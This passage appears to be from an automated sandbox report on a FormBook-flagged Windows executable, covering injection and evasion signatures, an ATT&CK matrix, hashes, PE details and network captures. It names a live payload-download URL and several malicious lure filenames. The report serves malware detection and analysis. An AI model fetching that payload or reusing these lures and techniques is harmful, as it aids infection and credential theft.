                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B0A5B mov eax, dword ptr fs:[00000030h]2_2_012B0A5B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A6A50 mov eax, dword ptr fs:[00000030h]2_2_012A6A50
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A6A50 mov eax, dword ptr fs:[00000030h]2_2_012A6A50
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A6A50 mov eax, dword ptr fs:[00000030h]2_2_012A6A50
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A6A50 mov eax, dword ptr fs:[00000030h]2_2_012A6A50
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A6A50 mov eax, dword ptr fs:[00000030h]2_2_012A6A50
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A6A50 mov eax, dword ptr fs:[00000030h]2_2_012A6A50
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A6A50 mov eax, dword ptr fs:[00000030h]2_2_012A6A50
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A8AA0 mov eax, dword ptr fs:[00000030h]2_2_012A8AA0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A8AA0 mov eax, dword ptr fs:[00000030h]2_2_012A8AA0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012F6AA4 mov eax, dword ptr fs:[00000030h]2_2_012F6AA4
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AEA80 mov eax, dword ptr fs:[00000030h]2_2_012AEA80
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AEA80 mov eax, dword ptr fs:[00000030h]2_2_012AEA80
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AEA80 mov eax, dword ptr fs:[00000030h]2_2_012AEA80
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AEA80 mov eax, dword ptr fs:[00000030h]2_2_012AEA80
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AEA80 mov eax, dword ptr fs:[00000030h]2_2_012AEA80
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AEA80 mov eax, dword ptr fs:[00000030h]2_2_012AEA80
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AEA80 mov eax, dword ptr fs:[00000030h]2_2_012AEA80
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AEA80 mov eax, dword ptr fs:[00000030h]2_2_012AEA80
                  Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2500380493.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2500256571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                  Remote Access Functionality

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2500380493.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2500256571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Scheduled Task/Job                  		1
                  Scheduled Task/Job                  		111
                  Process Injection                  		1
                  Disable or Modify Tools                  		OS Credential Dumping121
                  Security Software Discovery                  		Remote Services1
                  Archive Collected Data                  		11
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  DLL Side-Loading                  		1
                  Scheduled Task/Job                  		41
                  Virtualization/Sandbox Evasion                  		LSASS Memory1
                  Process Discovery                  		Remote Desktop ProtocolData from Removable Media1
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  DLL Side-Loading                  		111
                  Process Injection                  		Security Account Manager41
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared Drive2
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Deobfuscate/Decode Files or Information                  		NTDS12
                  System Information Discovery                  		Distributed Component Object ModelInput Capture3
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                  Obfuscated Files or Information                  		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Software Packing                  		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  file.exe21%ReversingLabs
                  file.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  No Antivirus matches

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  files.catbox.moe
                  		108.181.20.35
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://files.catbox.moe/ne8lox.mp4false
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://github.com/mgravell/protobuf-netfile.exe, 00000000.00000002.3043825245.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.0000000003A1E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3052663874.00000000069D0000.00000004.08000000.00040000.00000000.sdmpfalse
                        		high
                        https://files.catbox.moefile.exe, 00000000.00000002.3036442391.0000000002781000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://github.com/mgravell/protobuf-netifile.exe, 00000000.00000002.3043825245.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.0000000003A1E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3052663874.00000000069D0000.00000004.08000000.00040000.00000000.sdmpfalse
                            		high
                            https://stackoverflow.com/q/14436606/23354file.exe, 00000000.00000002.3036442391.000000000282A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.0000000003A1E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3052663874.00000000069D0000.00000004.08000000.00040000.00000000.sdmpfalse
                              		high
                              https://files.catbox.moe/ne8lox.mp41OWRumaBvqxiIWy/UyUzNnQ==file.exefalse
                                		high
                                https://github.com/mgravell/protobuf-netJfile.exe, 00000000.00000002.3043825245.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.0000000003A1E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3052663874.00000000069D0000.00000004.08000000.00040000.00000000.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefile.exe, 00000000.00000002.3036442391.0000000002781000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://stackoverflow.com/q/11564914/23354;file.exe, 00000000.00000002.3043825245.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.0000000003A1E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3052663874.00000000069D0000.00000004.08000000.00040000.00000000.sdmpfalse
                                      		high
                                      https://stackoverflow.com/q/2152978/23354file.exe, 00000000.00000002.3043825245.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.0000000003A1E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3052663874.00000000069D0000.00000004.08000000.00040000.00000000.sdmpfalse
                                        		high

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        108.181.20.35
                                        		files.catbox.moeCanada
                                        		852ASN852CAfalse

                                        General Information

                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1562756
                                        Start date and time:2024-11-26 00:18:56 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 7m 42s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Run name:Run with higher sleep bypass
                                        Number of analysed new started processes analysed:5
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:file.exe
                                        Detection:MAL
                                        Classification:mal88.troj.evad.winEXE@3/0@1/1
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 96%
                                        • Number of executed functions: 239
                                        • Number of non-executed functions: 229
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                        • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                        • Stop behavior analysis, all processes terminated

                                        Warnings

                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • VT rate limit hit for: file.exe

                                        Simulations

                                        Behavior and APIs

                                        No simulations

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        108.181.20.35Document.pdf.lnkGet hashmaliciousUnknownBrowse
                                        • files.catbox.moe/p1yr9i.pdf
                                        SecuriteInfo.com.HEUR.Trojan.OLE2.Agent.gen.26943.12401.msiGet hashmaliciousLummaC StealerBrowse
                                        • files.catbox.moe/nzct1p

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        files.catbox.moehttps://drive.google.com/uc?export=download&id=11w_oRLtDWJl2z1SKN0zkobTHd_Ix44t9Get hashmaliciousUnknownBrowse
                                        • 108.181.20.35
                                        LETA_pdf.vbsGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                        • 108.181.20.35
                                        file.exeGet hashmaliciousFormBookBrowse
                                        • 108.181.20.35
                                        https://files.catbox.moe/iz3lne.zipGet hashmaliciousUnknownBrowse
                                        • 108.181.20.35
                                        file.exeGet hashmaliciousFormBookBrowse
                                        • 108.181.20.35
                                        file.exeGet hashmaliciousFormBookBrowse
                                        • 108.181.20.35
                                        Exploit Detector LIST (2).batGet hashmaliciousUnknownBrowse
                                        • 108.181.20.35
                                        1.cmdGet hashmaliciousUnknownBrowse
                                        • 108.181.20.35
                                        Exploit Detector.batGet hashmaliciousUnknownBrowse
                                        • 108.181.20.35

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        ASN852CAfbot.ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 209.29.180.177
                                        fbot.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 142.169.14.254
                                        la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                        • 161.184.125.91
                                        loligang.spc.elfGet hashmaliciousMiraiBrowse
                                        • 99.199.126.12
                                        loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                        • 75.157.133.90
                                        loligang.mips.elfGet hashmaliciousMiraiBrowse
                                        • 207.216.32.196
                                        apep.mpsl.elfGet hashmaliciousMiraiBrowse
                                        • 207.6.179.91
                                        apep.arm6.elfGet hashmaliciousMiraiBrowse
                                        • 75.156.102.38
                                        powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                        • 137.186.28.11

                                        JA3 Fingerprints

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        3b5074b1b5d032e5620f69f9f700ff0eOrden de compra HO-PO-376-25.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                        • 108.181.20.35
                                        file.exeGet hashmaliciousCryptbotBrowse
                                        • 108.181.20.35
                                        INV-0542.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                        • 108.181.20.35
                                        Evidence of copyright infringement (2).batGet hashmaliciousUnknownBrowse
                                        • 108.181.20.35
                                        Evidence of copyright infringement.batGet hashmaliciousUnknownBrowse
                                        • 108.181.20.35
                                        Compilation of videos and images protected by copyright.batGet hashmaliciousUnknownBrowse
                                        • 108.181.20.35
                                        Verzameling van video's en afbeeldingen die beschermd zijn door auteursrecht (2).batGet hashmaliciousUnknownBrowse
                                        • 108.181.20.35
                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                        • 108.181.20.35
                                        xeno.batGet hashmaliciousUnknownBrowse
                                        • 108.181.20.35

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        No created / dropped files found

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):5.829055340453007
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:file.exe
                                        File size:233'472 bytes
                                        MD5:0a089e934eb856c3e809d0fac53000c7
                                        SHA1:661f86072031587be18ada0b6606ee82bb52038f
                                        SHA256:f4e5ec593dcb18dca253d98f5133050e96f27f86c1e46b5882abf797fefe26b1
                                        SHA512:026152c47e9547d1f2c254bdb824f9b8ac113df6b3a98c61b1ac4adde0286dc8a06ade4a3bd73a149b4a9eaad0f86d702ab4b4042dbb7c17cc0af5a14e34cadc
                                        SSDEEP:3072:Yc9licCNZFl65sQpIVlccSMXudYCKuY0OUM6Aoft7Gfu4V0tvHwytyUbthvB2C/9:YpFFlssZVlccSMXudcDVilp
                                        TLSH:B3343B4823C91A92F2EE0F37E4F36A518774FA51AF2FD30F684414FE0865B958951763
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....+Eg............................Z.... ........@.. ....................................`................................

                                        File Icon

                                        Icon Hash:00928e8e8686b000

                                        Static PE Info

                                        General

                                        Entrypoint:0x43a25a
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x67452B8B [Tue Nov 26 01:59:39 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3a2100x4a.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c0000x608.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x390000x0.text
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x3e0000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000x382600x384001931c9524e11329e565844fa1d3172d3False0.47356770833333334data5.852483276358291IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rsrc0x3c0000x6080x800ff8621dc8a96a099082f9302adaae846False0.34228515625data3.513048066419696IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x3e0000xc0x200c02b14840025dcf301bf41a675e2c86cFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_VERSION0x3c05c0x386data0.4312638580931264
                                        RT_MANIFEST0x3c41e0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                        Imports

                                        DLLImport
                                        mscoree.dll_CorExeMain

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 26, 2024 00:19:47.739559889 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:47.739620924 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:47.739691019 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:47.752526999 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:47.752564907 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:49.555907011 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:49.556051970 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:49.561063051 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:49.561080933 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:49.561405897 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:49.604231119 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:49.717746973 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:49.763340950 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:50.314306021 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:50.314330101 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:50.314337969 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:50.314347982 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:50.314369917 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:50.314462900 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:50.314502954 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:50.314554930 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:50.352159977 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:50.352180958 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:50.352413893 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:50.352432966 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:50.352479935 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:50.515465021 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:50.515487909 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:50.515583992 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:50.515605927 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:50.515652895 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:50.547625065 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:50.547646046 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:50.547748089 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:50.547760010 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:50.547802925 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:50.583452940 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:50.583472013 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:50.583566904 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:50.583586931 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:50.583631039 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:50.614166975 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:50.614190102 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:50.614340067 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:50.614363909 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:50.614413977 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:50.727610111 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:50.727628946 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:50.727719069 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:50.727737904 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:50.727787018 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:50.757879019 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:50.757895947 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:50.757958889 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:50.757992029 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:50.758009911 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:50.758039951 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:50.782293081 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:50.782314062 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:50.782407999 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:50.782423019 CET44349704108.181.20.35192.168.2.5
